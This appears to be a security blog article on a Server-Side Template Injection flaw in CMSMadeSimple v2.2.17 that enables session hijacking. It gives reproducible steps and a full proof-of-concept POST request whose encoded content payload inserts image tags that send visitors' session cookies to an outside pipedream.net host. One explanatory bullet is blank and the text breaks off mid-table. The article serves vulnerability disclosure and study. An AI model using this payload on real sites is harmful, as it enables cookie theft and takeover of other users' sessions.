CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)

CMSMadeSimple v2.2.17: Exploiting Server-Side Template Injection for Session Hijacking

Security vulnerabilities in content management systems (CMS) often go unnoticed until exploited in the wild. One such critical flaw was discovered in CMSMadeSimple v2.2.17, a widely used open-source PHP-based CMS, which enables attackers to hijack user sessions through a Server-Side Template Injection (SSTI) vulnerability. This article explores the technical depth of this exploit, its real-world impact, and the broader implications for web application security.

Understanding Server-Side Template Injection (SSTI)

SSTI occurs when a web application allows user input to be processed within a server-side template engine without proper sanitization. In this case, Smarty—a popular PHP template engine—is used by CMSMadeSimple to render dynamic content. When untrusted data is injected into templates, the engine may execute arbitrary code, leading to severe consequences like remote code execution, data exfiltration, or session hijacking.

Unlike client-side template injection (which is typically limited to XSS), SSTI operates on the server, giving attackers full control over the application’s runtime environment. This makes SSTI one of the most dangerous vulnerabilities in modern web applications.

Exploit Overview: Session Hijacking via SSTI

The vulnerability in CMSMadeSimple v2.2.17 was discovered by Mirabbas Ağalarov on July 13, 2023. It allows an authenticated attacker to inject malicious template code into the content editor, which is then rendered on public pages. When a victim visits the page, the injected code executes and leaks sensitive session cookies—specifically the CMSSESSID and other session identifiers—via HTTP requests to an attacker-controlled server.

This technique is particularly effective because:

• It bypasses traditional session protection mechanisms.
• It requires only an authenticated user account (e.g., admin or test user).
• It exploits a legitimate feature—content editing—without triggering security alerts.

Technical Steps & Payload Analysis

The exploit follows a clear, reproducible sequence:

1. Log in with a valid account (e.g., admin or test user).
2. Navigate to Content Manager → Add New Content.
3. Insert the following payload into the content_en field:

{$smarty.version}
{{7*7}}
{$smarty.now}
{$smarty.template}

Explanation:

• {$smarty.version} — Outputs the version of the Smarty engine, confirming template execution.
• {{7*7}} — Demonstrates arithmetic evaluation, proving that the template engine processes expressions.
• {$smarty.now} — Returns the current server time, validating dynamic execution.
• {$smarty.template} — Reveals the template filename, useful for debugging and exploitation.
• — Embeds malicious HTTP requests to an external server (e.g., Pipedream), where session cookies are captured.

Each img tag triggers a browser request to the attacker’s server, sending the cookie value in the URL path. Since cookies are sent with every HTTP request, the attacker can reconstruct the full session state.

POC Request & Vulnerability Chain

Here is the actual HTTP POST request used in the proof-of-concept (POC):

POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 988
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E

Key Observations:

Parameter	Value	Role
mact	CMSContentManager,m1_,admin_editcontent,0	Triggers content editing module.
m1_content_id	81	Identifies the content being edited.
content_en	<p>{...}</p>	Contains the SSTI payload.
Cookie	Session identifiers (e.g., <code